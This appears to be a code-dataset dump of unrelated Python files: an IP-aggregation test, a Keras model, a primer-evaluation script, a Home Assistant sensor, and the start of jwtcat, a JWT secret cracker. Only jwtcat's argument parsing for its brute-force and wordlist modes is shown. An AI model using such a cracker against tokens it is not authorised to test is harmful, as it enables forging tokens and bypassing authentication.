# summed per IP, and ``internal`` reflects membership in the configured
# internal networks (8.0.0.0/8 covers 8.8.8.8).
RESULT = [
    {"ip": "1.1.1.1", "sightings": 3, "internal": False},
    {"ip": "8.8.8.8", "sightings": 11, "internal": True}
]
def test_aggregate_command():
    """
    Given:
    - previous list aggregated IPs
    - new data source with IP/sightings information
    - merged aggregated data with new information
    - list of internal ip networks
    When
    - merging new sightings to existing aggregated data
    Then
    - data is merged
    - expected output is returned
    """
    result = ExpanseAggregateAttributionIP.aggregate_command({
        'input': INPUT,
        'current': CURRENT,
        'internal_ip_networks': "192.168.0.0/16,10.0.0.0/8,8.0.0.0/8"
    })
    # Context path and key field are fixed by the script's contract.
    assert result.outputs_prefix == "Expanse.AttributionIP"
    assert result.outputs_key_field == "ip"
    # Merged aggregation must match the precomputed expectation exactly.
    assert result.outputs == RESULT
| 0 | 0 | 0 |
9272b186aad2acbc4661815d4cf0bc2a2b4fbddf | 2,065 | py | Python | models/regression/DeepConvLSTM_2.py | Neronjust2017/keras-project | 919e67e10b0bf518eb9cc63df68c79fe2bb71b36 | [
"Apache-2.0"
] | 2 | 2020-07-07T12:29:02.000Z | 2020-09-16T15:33:02.000Z | models/regression/DeepConvLSTM_2.py | Neronjust2017/keras-project | 919e67e10b0bf518eb9cc63df68c79fe2bb71b36 | [
"Apache-2.0"
] | 1 | 2020-10-04T12:08:27.000Z | 2020-10-05T05:05:39.000Z | models/regression/DeepConvLSTM_2.py | Neronjust2017/keras-project | 919e67e10b0bf518eb9cc63df68c79fe2bb71b36 | [
"Apache-2.0"
] | null | null | null | import tensorflow.keras as keras
import tensorflow as tf
| 31.769231 | 77 | 0.48862 | import tensorflow.keras as keras
import tensorflow as tf
class DeepConvLSTM2(keras.Model):
    """Stacked Conv2D + LSTM regression model (a DeepConvLSTM variant).

    Four ReLU-activated 2-D convolutions are followed by two
    dropout-regularised LSTM layers and a sigmoid dense output.

    NOTE(review): the indexing below implies ``input_dim`` is ordered as
    (channels, cols, samples) -- confirm against the caller.
    """

    def __init__(self, input_dim, output_dim):
        super(DeepConvLSTM2, self).__init__()
        # Dimensions unpacked from input_dim; ``rows`` is fixed to 1, so
        # the 2-D convolutions effectively act on 1-D sequences.
        self.samples = input_dim[2]
        self.channels = input_dim[0]
        self.rows = 1
        self.cols = input_dim[1]
        # Convolution stack: filter count doubles at each stage
        # (64 -> 128 -> 256 -> 512), 'same' padding keeps spatial size.
        self.conv1 = keras.layers.Conv2D(
            input_shape=(self.channels, self.rows, self.cols),
            filters=64,
            kernel_size=5,
            padding='same',
            strides=1
        )
        self.conv2 = keras.layers.Conv2D(
            filters=128,
            kernel_size=5,
            padding='same',
            strides=1
        )
        self.conv3 = keras.layers.Conv2D(
            filters=256,
            kernel_size=5,
            padding='same',
            strides=1
        )
        self.conv4 = keras.layers.Conv2D(
            filters=512,
            kernel_size=5,
            padding='same',
            strides=1
        )
        # A single shared ReLU activation layer reused between stages.
        self.relu = keras.layers.Activation('relu')
        # First LSTM returns the full sequence so it can feed the second.
        self.lstm1 = keras.layers.LSTM(128,
                                       return_sequences = True,
                                       dropout = 0.5,
                                       recurrent_dropout = 0.5)
        self.lstm2 = keras.layers.LSTM(128,
                                       dropout=0.5,
                                       recurrent_dropout=0.5)
        # Sigmoid output head sized to the regression target.
        self.dense = keras.layers.Dense(output_dim, activation='sigmoid')

    def call(self, x):
        """Forward pass: conv stack, flatten per channel, LSTMs, dense."""
        #x.reshape(-1, self.channels, self.rows, self.cols)
        # Reshape the flat input into (samples, channels, rows, cols).
        # NOTE(review): ``self.samples`` is baked in at construction time,
        # so this ties the model to a fixed batch size -- confirm intended.
        x = tf.reshape(x,[self.samples, self.channels, self.rows, self.cols])
        x = self.conv1(x)
        x = self.relu(x)
        x = self.conv2(x)
        x = self.relu(x)
        x = self.conv3(x)
        x = self.relu(x)
        x = self.conv4(x)
        x = self.relu(x)
        # Collapse the spatial/filter dims into one feature axis per channel
        # so the LSTMs see (batch=samples, time=channels, features).
        x = tf.reshape(x, [self.samples, self.channels, -1])
        x = self.lstm1(x)
        x = self.relu(x)
        x = self.lstm2(x)
        x = self.relu(x)
        x = self.dense(x)
        return x
| 1,920 | 12 | 76 |
90e37972b36a35b93996ac8f5e5e0e05f5d6e812 | 31 | py | Python | myUnittest/case_way/__init__.py | ChenJiR/MyPyUnittest | 77ecde87218a0ca7482e4d1dfebd403e2325165a | [
"MIT"
] | null | null | null | myUnittest/case_way/__init__.py | ChenJiR/MyPyUnittest | 77ecde87218a0ca7482e4d1dfebd403e2325165a | [
"MIT"
] | null | null | null | myUnittest/case_way/__init__.py | ChenJiR/MyPyUnittest | 77ecde87218a0ca7482e4d1dfebd403e2325165a | [
"MIT"
] | null | null | null | from .case_decorators import *
| 15.5 | 30 | 0.806452 | from .case_decorators import *
| 0 | 0 | 0 |
bad8917af68ec43ce71ed92928cbf6cfa3debbb5 | 10,197 | py | Python | primer_evauation.py | eastgenomics/primer_designer | 5332d82a4bf1079c985976a9b7b6a04f9573b38a | [
"MIT"
] | 1 | 2021-03-24T22:33:03.000Z | 2021-03-24T22:33:03.000Z | primer_evauation.py | eastgenomics/primer_designer | 5332d82a4bf1079c985976a9b7b6a04f9573b38a | [
"MIT"
] | 1 | 2021-03-24T22:33:11.000Z | 2021-03-24T22:33:11.000Z | primer_evauation.py | eastgenomics/primer_designer | 5332d82a4bf1079c985976a9b7b6a04f9573b38a | [
"MIT"
] | null | null | null | #!/usr/bin/python
#
#
#
#
# Kim Brugger (21 Oct 2015), contact: kbr@brugger.dk
import sys
import os
import pprint
pp = pprint.PrettyPrinter(indent=4)
import re
FLANK = 500
NR_PRIMERS = 4
ALLOWED_MISMATCHES = 4
MAX_MAPPINGS = 5
MAX_PRODUCT_SIZE = 800
MIN_PRODUCT_SIZE = 120
smalt_file = '8:96259936.smalt'
if ( sys.argv >= 1 ):
smalt_file = sys.argv[1]
region = smalt_file.rstrip(".smalt")
(chromo, pos) = region.split(":")
(start_pos, end_pos) = map(int, pos.split("-"))
primer_data = check_primers( smalt_file )
#pp.pprint( primer_data )
pcr_products = digital_PCR( primer_data )
pcr_products = check_PCR_products( pcr_products, chromo, start_pos, end_pos )
fwd_primer, rev_primer = pick_best_primers(primer_data, chromo, start_pos, end_pos)
print " Picked Primer Pair ( %s, %s )" % ( fwd_primer, rev_primer)
print "SMALT FILE :: %s " % smalt_file
| 29.386167 | 149 | 0.521624 | #!/usr/bin/python
#
#
#
#
# Kim Brugger (21 Oct 2015), contact: kbr@brugger.dk
import sys
import os
import pprint
pp = pprint.PrettyPrinter(indent=4)
import re
FLANK = 500
NR_PRIMERS = 4
ALLOWED_MISMATCHES = 4
MAX_MAPPINGS = 5
MAX_PRODUCT_SIZE = 800
MIN_PRODUCT_SIZE = 120
def check_primers(smalt_results):
    """Parse a SMALT SAM-format mapping file and summarise primer hits.

    Args:
        smalt_results (str): path to the SMALT output (SAM) file.

    Returns:
        dict: primer name -> {'CHR': [chrom, ...], 'POS': [pos-string, ...],
        'MAPPING_SUMMARY': str}.  Only hits within ALLOWED_MISMATCHES of a
        full-length match are kept.  The 'FULLSEQ' pseudo-primer is recorded
        but gets no MAPPING_SUMMARY.
    """
    res = {}
    # NOTE: the original opened with mode 'rU', which was removed in
    # Python 3.11; universal newlines are the default in text mode.
    with open(smalt_results, 'r') as smalt_output:
        for line in smalt_output:
            if line.startswith("@"):
                # SAM header line
                continue

            fields = line.rstrip("\n").split("\t")
            name = fields[0]
            chromosome = fields[2]
            position = fields[3]
            read_length = len(fields[9])
            # fields[12] is the alignment-score tag, e.g. "AS:i:23"
            length_matched = int(re.sub("AS:i:", '', fields[12]))

            if name not in res:
                res[name] = {'CHR': [], 'POS': []}

            # Keep the hit only if the aligned length is within the
            # configured mismatch allowance of the full read length.
            if read_length <= length_matched + ALLOWED_MISMATCHES:
                res[name]['CHR'].append(chromosome)
                res[name]['POS'].append(position)

    for primer in res:
        if primer == 'FULLSEQ':
            continue

        res[primer]['MAPPING_SUMMARY'] = 'unique mapping'

        nr_of_chromosomes = len(set(res[primer]['CHR']))
        nr_of_mappings = len(res[primer]['POS'])

        # NOTE: at exactly MAX_MAPPINGS hits the first branch wins, matching
        # the original boundary behaviour.  Chromosome order in the summary
        # comes from a set and is therefore arbitrary.
        if 1 < nr_of_mappings <= MAX_MAPPINGS:
            res[primer]['MAPPING_SUMMARY'] = '%d mappings' % nr_of_mappings
            res[primer]['MAPPING_SUMMARY'] += \
                " to chromosomes: " + ",".join(set(res[primer]['CHR']))
        elif nr_of_mappings >= MAX_MAPPINGS:
            res[primer]['MAPPING_SUMMARY'] = '%d mappings' % nr_of_mappings
            res[primer]['MAPPING_SUMMARY'] += \
                " on %d chromosomes" % nr_of_chromosomes

    return res
def digital_PCR(primer_mappings):
    """In-silico PCR: pair every LEFT primer with every RIGHT primer.

    Args:
        primer_mappings (dict): output of check_primers(); primer name ->
            {'CHR': [...], 'POS': [...], ...}.

    Returns:
        dict: fwd-primer -> rev-primer -> list of candidate products, each
        {'chr', 'start_pos', 'end_pos', 'size'}.  A product is emitted for
        every same-chromosome LEFT/RIGHT hit combination; no size filtering
        is applied here (check_PCR_products() does that).

    Note: the original function also built a parallel ``mappings`` dict that
    was never returned, and carried a large unreachable block after its
    ``return`` statement; both have been removed.
    """
    products = {}

    for fwd_name in sorted(primer_mappings):
        if fwd_name == 'FULLSEQ' or not re.search(r'LEFT', fwd_name):
            continue
        products[fwd_name] = {}

        for rev_name in sorted(primer_mappings):
            if rev_name == 'FULLSEQ' or not re.search(r'RIGHT', rev_name):
                continue

            pair_products = []
            # CHR and POS are appended in lockstep by check_primers(), so
            # zipping them pairs each hit's chromosome with its position.
            fwd_hits = zip(primer_mappings[fwd_name]['CHR'],
                           primer_mappings[fwd_name]['POS'])
            for fwd_chr, fwd_pos in fwd_hits:
                rev_hits = zip(primer_mappings[rev_name]['CHR'],
                               primer_mappings[rev_name]['POS'])
                for rev_chr, rev_pos in rev_hits:
                    if fwd_chr != rev_chr:
                        # primers on different chromosomes cannot amplify
                        continue
                    start = int(fwd_pos)
                    end = int(rev_pos)
                    pair_products.append({'chr': fwd_chr,
                                          'start_pos': start,
                                          'end_pos': end,
                                          'size': end - start})

            products[fwd_name][rev_name] = pair_products

    return products
def check_PCR_products(products, target_chr, target_start, target_end):
    """Classify candidate PCR products as usable ('good') or mis-primed ('bad').

    Args:
        products (dict): fwd -> rev -> [product dicts] from digital_PCR().
        target_chr (str): chromosome of the region of interest.
        target_start (int): region start position.
        target_end (int): region end position.

    Returns:
        dict: same structure, but each product list is replaced by
        {'good': [...], 'bad': [...]}.  Products of the wrong size are
        silently dropped (neither list); products on the wrong chromosome or
        not spanning the target region go to 'bad'.  Mutates ``products``
        in place and also returns it.
    """
    for primer1 in products:
        for primer2 in products[primer1]:
            good_products = []
            bad_products = []

            for product in products[primer1][primer2]:
                size = product['end_pos'] - product['start_pos'] + 1
                if size < MIN_PRODUCT_SIZE or size > MAX_PRODUCT_SIZE:
                    # Out-of-range sizes are discarded without record,
                    # matching the original behaviour.
                    pass
                elif target_chr != product['chr']:
                    print(" mis priming on diff chromosome ")
                    bad_products.append(product)
                elif target_start < product['start_pos'] or target_end > product['end_pos']:
                    # Product does not fully span the region of interest.
                    print("%s > %s or %s < %s " % (target_start, product['start_pos'], target_end, product['end_pos']))
                    print("wrong region ( %s & %s )" % (primer1, primer2))
                    bad_products.append(product)
                else:
                    good_products.append(product)

            products[primer1][primer2] = {'good': good_products,
                                          'bad': bad_products}

    return products
smalt_file = '8:96259936.smalt'
def pick_best_primers(primer_data, chromo, start_pos, end_pos):
    """Pick the best forward/reverse primer pair for the target region.

    Rules (from the original design notes): only uniquely-mapping primers on
    the target chromosome are eligible; among those, the LEFT primer closest
    upstream of the region and the RIGHT primer closest downstream win.

    Args:
        primer_data (dict): output of check_primers().
        chromo (str): target chromosome.
        start_pos (int): target region start.
        end_pos (int): target region end.

    Returns:
        tuple: (forward primer name or None, reverse primer name or None).
    """
    closest_fwd, dist_fwd = None, None
    closest_rev, dist_rev = None, None

    for primer in primer_data:
        if primer == 'FULLSEQ':
            continue

        if primer_data[primer]['MAPPING_SUMMARY'] != 'unique mapping':
            print("Non unique mapping ( %s )" % primer)
            continue

        if primer_data[primer]['CHR'][0] != chromo:
            print("Unique mapping to different chromosome (%s). Should never happen! " % primer)
            continue

        if primer.find('LEFT') >= 0:
            # Distance from the primer's mapping position up to region start.
            primer_dist = start_pos - int(primer_data[primer]['POS'][0]) + 1
            if primer_dist < 0:
                print("Primer %s downstream of region ! ( %d [%d, %d])" % (primer, primer_dist, start_pos, int(primer_data[primer]['POS'][0])))
                continue
            if dist_fwd is None or primer_dist < dist_fwd:
                dist_fwd = primer_dist
                closest_fwd = primer
        elif primer.find('RIGHT') >= 0:
            primer_dist = int(primer_data[primer]['POS'][0]) - end_pos + 1
            if primer_dist < 0:
                # (typo "uptream" in the original message fixed)
                print("Primer %s upstream of region ! (%d)" % (primer, primer_dist))
                continue
            if dist_rev is None or primer_dist < dist_rev:
                dist_rev = primer_dist
                closest_rev = primer

    return closest_fwd, closest_rev
# ---- command-line entry: resolve the SMALT file, then run the pipeline ----
# BUG FIX: the original tested `sys.argv >= 1`, which compares a list to an
# int (always True on Python 2, TypeError on Python 3) and then crashed with
# IndexError when no argument was given.
if len(sys.argv) > 1:
    smalt_file = sys.argv[1]

# The region is encoded in the file name, e.g. "8:123-456.smalt".
# str.rstrip(".smalt") would strip a *character set*, not the suffix, so
# slice the suffix off explicitly instead.
if smalt_file.endswith(".smalt"):
    region = smalt_file[:-len(".smalt")]
else:
    region = smalt_file
(chromo, pos) = region.split(":")
# Accept both "start-end" ranges and single-position regions
# (the default file name has no "-" and crashed the original unpacking).
if "-" in pos:
    (start_pos, end_pos) = map(int, pos.split("-"))
else:
    start_pos = end_pos = int(pos)

primer_data = check_primers(smalt_file)
pcr_products = digital_PCR(primer_data)
pcr_products = check_PCR_products(pcr_products, chromo, start_pos, end_pos)
fwd_primer, rev_primer = pick_best_primers(primer_data, chromo, start_pos, end_pos)
print(" Picked Primer Pair ( %s, %s )" % (fwd_primer, rev_primer))
print("SMALT FILE :: %s " % smalt_file)
| 9,174 | 0 | 108 |
468b7ced0e8f8a70318c5c31ab90dbec90b9c0e1 | 6,722 | py | Python | homeassistant/components/kaleidescape/sensor.py | MrDelik/core | 93a66cc357b226389967668441000498a10453bb | [
"Apache-2.0"
] | 30,023 | 2016-04-13T10:17:53.000Z | 2020-03-02T12:56:31.000Z | homeassistant/components/kaleidescape/sensor.py | MrDelik/core | 93a66cc357b226389967668441000498a10453bb | [
"Apache-2.0"
] | 24,710 | 2016-04-13T08:27:26.000Z | 2020-03-02T12:59:13.000Z | homeassistant/components/kaleidescape/sensor.py | MrDelik/core | 93a66cc357b226389967668441000498a10453bb | [
"Apache-2.0"
] | 11,956 | 2016-04-13T18:42:31.000Z | 2020-03-02T09:32:12.000Z | """Sensor platform for Kaleidescape integration."""
from __future__ import annotations
from dataclasses import dataclass
from typing import TYPE_CHECKING
from homeassistant.components.sensor import SensorEntity, SensorEntityDescription
from homeassistant.const import PERCENTAGE
from homeassistant.helpers.entity import EntityCategory
from .const import DOMAIN as KALEIDESCAPE_DOMAIN
from .entity import KaleidescapeEntity
if TYPE_CHECKING:
from collections.abc import Callable
from kaleidescape import Device as KaleidescapeDevice
from homeassistant.config_entries import ConfigEntry
from homeassistant.core import HomeAssistant
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from homeassistant.helpers.typing import StateType
@dataclass
class BaseEntityDescriptionMixin:
    """Mixin for required descriptor keys."""

    # Callable that extracts this sensor's current value from the
    # kaleidescape Device object (see SENSOR_TYPES for the lambdas used).
    value_fn: Callable[[KaleidescapeDevice], StateType]
@dataclass
class KaleidescapeSensorEntityDescription(
    SensorEntityDescription, BaseEntityDescriptionMixin
):
    """Describes Kaleidescape sensor entity."""
    # The mixin is listed last so that (via reverse-MRO dataclass field
    # collection) the required value_fn field precedes the defaulted fields
    # inherited from SensorEntityDescription.
# Static catalogue of the sensors created for every Kaleidescape device.
# Each entry couples Home Assistant presentation metadata (key, name, icon,
# category, unit) with a value_fn reading the live value off the device.
SENSOR_TYPES: tuple[KaleidescapeSensorEntityDescription, ...] = (
    # -- playback state --
    KaleidescapeSensorEntityDescription(
        key="media_location",
        name="Media Location",
        icon="mdi:monitor",
        value_fn=lambda device: device.automation.movie_location,
    ),
    KaleidescapeSensorEntityDescription(
        key="play_status",
        name="Play Status",
        icon="mdi:monitor",
        value_fn=lambda device: device.movie.play_status,
    ),
    KaleidescapeSensorEntityDescription(
        key="play_speed",
        name="Play Speed",
        icon="mdi:monitor",
        value_fn=lambda device: device.movie.play_speed,
    ),
    # -- video output diagnostics --
    KaleidescapeSensorEntityDescription(
        key="video_mode",
        name="Video Mode",
        icon="mdi:monitor-screenshot",
        entity_category=EntityCategory.DIAGNOSTIC,
        value_fn=lambda device: device.automation.video_mode,
    ),
    KaleidescapeSensorEntityDescription(
        key="video_color_eotf",
        name="Video Color EOTF",
        icon="mdi:monitor-eye",
        entity_category=EntityCategory.DIAGNOSTIC,
        value_fn=lambda device: device.automation.video_color_eotf,
    ),
    KaleidescapeSensorEntityDescription(
        key="video_color_space",
        name="Video Color Space",
        icon="mdi:monitor-eye",
        entity_category=EntityCategory.DIAGNOSTIC,
        value_fn=lambda device: device.automation.video_color_space,
    ),
    KaleidescapeSensorEntityDescription(
        key="video_color_depth",
        name="Video Color Depth",
        icon="mdi:monitor-eye",
        entity_category=EntityCategory.DIAGNOSTIC,
        value_fn=lambda device: device.automation.video_color_depth,
    ),
    KaleidescapeSensorEntityDescription(
        key="video_color_sampling",
        name="Video Color Sampling",
        icon="mdi:monitor-eye",
        entity_category=EntityCategory.DIAGNOSTIC,
        value_fn=lambda device: device.automation.video_color_sampling,
    ),
    # -- screen-mask diagnostics (relative values are reported in tenths of
    #    a percent by the device, hence the / 10.0 conversions) --
    KaleidescapeSensorEntityDescription(
        key="screen_mask_ratio",
        name="Screen Mask Ratio",
        icon="mdi:monitor-screenshot",
        entity_category=EntityCategory.DIAGNOSTIC,
        value_fn=lambda device: device.automation.screen_mask_ratio,
    ),
    KaleidescapeSensorEntityDescription(
        key="screen_mask_top_trim_rel",
        name="Screen Mask Top Trim Rel",
        icon="mdi:monitor-screenshot",
        entity_category=EntityCategory.DIAGNOSTIC,
        native_unit_of_measurement=PERCENTAGE,
        value_fn=lambda device: device.automation.screen_mask_top_trim_rel / 10.0,
    ),
    KaleidescapeSensorEntityDescription(
        key="screen_mask_bottom_trim_rel",
        name="Screen Mask Bottom Trim Rel",
        icon="mdi:monitor-screenshot",
        entity_category=EntityCategory.DIAGNOSTIC,
        native_unit_of_measurement=PERCENTAGE,
        value_fn=lambda device: device.automation.screen_mask_bottom_trim_rel / 10.0,
    ),
    KaleidescapeSensorEntityDescription(
        key="screen_mask_conservative_ratio",
        name="Screen Mask Conservative Ratio",
        icon="mdi:monitor-screenshot",
        entity_category=EntityCategory.DIAGNOSTIC,
        value_fn=lambda device: device.automation.screen_mask_conservative_ratio,
    ),
    KaleidescapeSensorEntityDescription(
        key="screen_mask_top_mask_abs",
        name="Screen Mask Top Mask Abs",
        icon="mdi:monitor-screenshot",
        entity_category=EntityCategory.DIAGNOSTIC,
        native_unit_of_measurement=PERCENTAGE,
        value_fn=lambda device: device.automation.screen_mask_top_mask_abs / 10.0,
    ),
    KaleidescapeSensorEntityDescription(
        key="screen_mask_bottom_mask_abs",
        name="Screen Mask Bottom Mask Abs",
        icon="mdi:monitor-screenshot",
        entity_category=EntityCategory.DIAGNOSTIC,
        native_unit_of_measurement=PERCENTAGE,
        value_fn=lambda device: device.automation.screen_mask_bottom_mask_abs / 10.0,
    ),
    # -- CinemaScape diagnostics --
    KaleidescapeSensorEntityDescription(
        key="cinemascape_mask",
        name="Cinemascape Mask",
        icon="mdi:monitor-star",
        entity_category=EntityCategory.DIAGNOSTIC,
        value_fn=lambda device: device.automation.cinemascape_mask,
    ),
    KaleidescapeSensorEntityDescription(
        key="cinemascape_mode",
        name="Cinemascape Mode",
        icon="mdi:monitor-star",
        entity_category=EntityCategory.DIAGNOSTIC,
        value_fn=lambda device: device.automation.cinemascape_mode,
    ),
)
async def async_setup_entry(
    hass: HomeAssistant, entry: ConfigEntry, async_add_entities: AddEntitiesCallback
) -> None:
    """Set up the platform from a config entry."""
    # The connected device was stored in hass.data by the integration setup.
    device: KaleidescapeDevice = hass.data[KALEIDESCAPE_DOMAIN][entry.entry_id]
    sensors = [
        KaleidescapeSensor(device, description) for description in SENSOR_TYPES
    ]
    async_add_entities(sensors)
class KaleidescapeSensor(KaleidescapeEntity, SensorEntity):
    """Representation of a Kaleidescape sensor."""

    # Narrowed from the base class so value_fn is visible to type checkers.
    entity_description: KaleidescapeSensorEntityDescription

    def __init__(
        self,
        device: KaleidescapeDevice,
        entity_description: KaleidescapeSensorEntityDescription,
    ) -> None:
        """Initialize sensor."""
        super().__init__(device)
        self.entity_description = entity_description
        # Suffix the base id/name (presumably set by KaleidescapeEntity's
        # __init__ — confirm) with the per-sensor key/name so each of the
        # device's sensors gets a distinct unique_id and display name.
        self._attr_unique_id = f"{self._attr_unique_id}-{entity_description.key}"
        self._attr_name = f"{self._attr_name} {entity_description.name}"

    @property
    def native_value(self) -> StateType:
        """Return value of sensor."""
        # Delegate to the description's extractor against the wrapped device.
        return self.entity_description.value_fn(self._device)
| 35.946524 | 85 | 0.717792 | """Sensor platform for Kaleidescape integration."""
from __future__ import annotations
from dataclasses import dataclass
from typing import TYPE_CHECKING
from homeassistant.components.sensor import SensorEntity, SensorEntityDescription
from homeassistant.const import PERCENTAGE
from homeassistant.helpers.entity import EntityCategory
from .const import DOMAIN as KALEIDESCAPE_DOMAIN
from .entity import KaleidescapeEntity
if TYPE_CHECKING:
from collections.abc import Callable
from kaleidescape import Device as KaleidescapeDevice
from homeassistant.config_entries import ConfigEntry
from homeassistant.core import HomeAssistant
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from homeassistant.helpers.typing import StateType
@dataclass
class BaseEntityDescriptionMixin:
"""Mixin for required descriptor keys."""
value_fn: Callable[[KaleidescapeDevice], StateType]
@dataclass
class KaleidescapeSensorEntityDescription(
SensorEntityDescription, BaseEntityDescriptionMixin
):
"""Describes Kaleidescape sensor entity."""
SENSOR_TYPES: tuple[KaleidescapeSensorEntityDescription, ...] = (
KaleidescapeSensorEntityDescription(
key="media_location",
name="Media Location",
icon="mdi:monitor",
value_fn=lambda device: device.automation.movie_location,
),
KaleidescapeSensorEntityDescription(
key="play_status",
name="Play Status",
icon="mdi:monitor",
value_fn=lambda device: device.movie.play_status,
),
KaleidescapeSensorEntityDescription(
key="play_speed",
name="Play Speed",
icon="mdi:monitor",
value_fn=lambda device: device.movie.play_speed,
),
KaleidescapeSensorEntityDescription(
key="video_mode",
name="Video Mode",
icon="mdi:monitor-screenshot",
entity_category=EntityCategory.DIAGNOSTIC,
value_fn=lambda device: device.automation.video_mode,
),
KaleidescapeSensorEntityDescription(
key="video_color_eotf",
name="Video Color EOTF",
icon="mdi:monitor-eye",
entity_category=EntityCategory.DIAGNOSTIC,
value_fn=lambda device: device.automation.video_color_eotf,
),
KaleidescapeSensorEntityDescription(
key="video_color_space",
name="Video Color Space",
icon="mdi:monitor-eye",
entity_category=EntityCategory.DIAGNOSTIC,
value_fn=lambda device: device.automation.video_color_space,
),
KaleidescapeSensorEntityDescription(
key="video_color_depth",
name="Video Color Depth",
icon="mdi:monitor-eye",
entity_category=EntityCategory.DIAGNOSTIC,
value_fn=lambda device: device.automation.video_color_depth,
),
KaleidescapeSensorEntityDescription(
key="video_color_sampling",
name="Video Color Sampling",
icon="mdi:monitor-eye",
entity_category=EntityCategory.DIAGNOSTIC,
value_fn=lambda device: device.automation.video_color_sampling,
),
KaleidescapeSensorEntityDescription(
key="screen_mask_ratio",
name="Screen Mask Ratio",
icon="mdi:monitor-screenshot",
entity_category=EntityCategory.DIAGNOSTIC,
value_fn=lambda device: device.automation.screen_mask_ratio,
),
KaleidescapeSensorEntityDescription(
key="screen_mask_top_trim_rel",
name="Screen Mask Top Trim Rel",
icon="mdi:monitor-screenshot",
entity_category=EntityCategory.DIAGNOSTIC,
native_unit_of_measurement=PERCENTAGE,
value_fn=lambda device: device.automation.screen_mask_top_trim_rel / 10.0,
),
KaleidescapeSensorEntityDescription(
key="screen_mask_bottom_trim_rel",
name="Screen Mask Bottom Trim Rel",
icon="mdi:monitor-screenshot",
entity_category=EntityCategory.DIAGNOSTIC,
native_unit_of_measurement=PERCENTAGE,
value_fn=lambda device: device.automation.screen_mask_bottom_trim_rel / 10.0,
),
KaleidescapeSensorEntityDescription(
key="screen_mask_conservative_ratio",
name="Screen Mask Conservative Ratio",
icon="mdi:monitor-screenshot",
entity_category=EntityCategory.DIAGNOSTIC,
value_fn=lambda device: device.automation.screen_mask_conservative_ratio,
),
KaleidescapeSensorEntityDescription(
key="screen_mask_top_mask_abs",
name="Screen Mask Top Mask Abs",
icon="mdi:monitor-screenshot",
entity_category=EntityCategory.DIAGNOSTIC,
native_unit_of_measurement=PERCENTAGE,
value_fn=lambda device: device.automation.screen_mask_top_mask_abs / 10.0,
),
KaleidescapeSensorEntityDescription(
key="screen_mask_bottom_mask_abs",
name="Screen Mask Bottom Mask Abs",
icon="mdi:monitor-screenshot",
entity_category=EntityCategory.DIAGNOSTIC,
native_unit_of_measurement=PERCENTAGE,
value_fn=lambda device: device.automation.screen_mask_bottom_mask_abs / 10.0,
),
KaleidescapeSensorEntityDescription(
key="cinemascape_mask",
name="Cinemascape Mask",
icon="mdi:monitor-star",
entity_category=EntityCategory.DIAGNOSTIC,
value_fn=lambda device: device.automation.cinemascape_mask,
),
KaleidescapeSensorEntityDescription(
key="cinemascape_mode",
name="Cinemascape Mode",
icon="mdi:monitor-star",
entity_category=EntityCategory.DIAGNOSTIC,
value_fn=lambda device: device.automation.cinemascape_mode,
),
)
async def async_setup_entry(
hass: HomeAssistant, entry: ConfigEntry, async_add_entities: AddEntitiesCallback
) -> None:
"""Set up the platform from a config entry."""
device: KaleidescapeDevice = hass.data[KALEIDESCAPE_DOMAIN][entry.entry_id]
async_add_entities(
KaleidescapeSensor(device, description) for description in SENSOR_TYPES
)
class KaleidescapeSensor(KaleidescapeEntity, SensorEntity):
"""Representation of a Kaleidescape sensor."""
entity_description: KaleidescapeSensorEntityDescription
def __init__(
self,
device: KaleidescapeDevice,
entity_description: KaleidescapeSensorEntityDescription,
) -> None:
"""Initialize sensor."""
super().__init__(device)
self.entity_description = entity_description
self._attr_unique_id = f"{self._attr_unique_id}-{entity_description.key}"
self._attr_name = f"{self._attr_name} {entity_description.name}"
@property
def native_value(self) -> StateType:
"""Return value of sensor."""
return self.entity_description.value_fn(self._device)
| 0 | 0 | 0 |
9842462bbceae77c84a005622d5cad9050cc08cf | 9,334 | py | Python | jwtcat.py | xrzhev/jwtcat | 64dde89c2e2e7634d9f5d7bbb5a788952e04e345 | [
"Apache-2.0"
] | 1 | 2021-05-04T22:48:00.000Z | 2021-05-04T22:48:00.000Z | jwtcat.py | FDlucifer/jwtcat | 64dde89c2e2e7634d9f5d7bbb5a788952e04e345 | [
"Apache-2.0"
] | null | null | null | jwtcat.py | FDlucifer/jwtcat | 64dde89c2e2e7634d9f5d7bbb5a788952e04e345 | [
"Apache-2.0"
] | 1 | 2021-08-31T14:24:16.000Z | 2021-08-31T14:24:16.000Z | #!/usr/bin/env python3
# Copyright (C) 2017 - 2020 Alexandre Teyar
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import json
import logging
import os
import signal
import sys
import time
from datetime import datetime, timedelta
from itertools import chain, product
import coloredlogs
import jwt
from tqdm import tqdm
logger = logging.getLogger(__name__)
coloredlogs.install(level='DEBUG', milliseconds=True)
def parse_args():
"""This function parses the command line.
Returns:
[object] -- The parsed arguments
"""
parser = argparse.ArgumentParser(
description="A CPU-based JSON Web Token (JWT) cracker",
formatter_class=argparse.ArgumentDefaultsHelpFormatter
)
subparsers = parser.add_subparsers(
dest='attack_mode',
title="Attack-mode",
required=True
)
brute_force_subparser = subparsers.add_parser(
"brute-force",
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
)
brute_force_subparser.add_argument(
"-c", "--charset",
default="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789",
dest="charset",
help="User-defined charset",
type=str,
required=False,
)
brute_force_subparser.add_argument(
"--increment-min",
default=1,
dest="increment_min",
help="Start incrementing at X",
type=int,
required=False,
)
brute_force_subparser.add_argument(
"--increment-max",
default=8,
dest="increment_max",
help="Stop incrementing at X",
type=int,
required=False,
)
cve_subparser = subparsers.add_parser(
"vulnerable",
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
)
wordlist__subparser = subparsers.add_parser(
"wordlist",
formatter_class=argparse.ArgumentDefaultsHelpFormatter,
)
# Set the UTF-8 encoding and ignore error mode to avoid issues with the wordlist
wordlist__subparser.add_argument(
"-w", "--wordlist",
default=argparse.SUPPRESS,
dest="wordlist",
help="Wordlist of private key candidates",
required=True,
type=argparse.FileType(
'r',
encoding='UTF-8',
errors='ignore'
)
)
parser.add_argument(
"-lL", "--log-level",
default=logging.INFO,
dest="log_level",
# TODO: Improve how to retrieve all log levels
choices=[
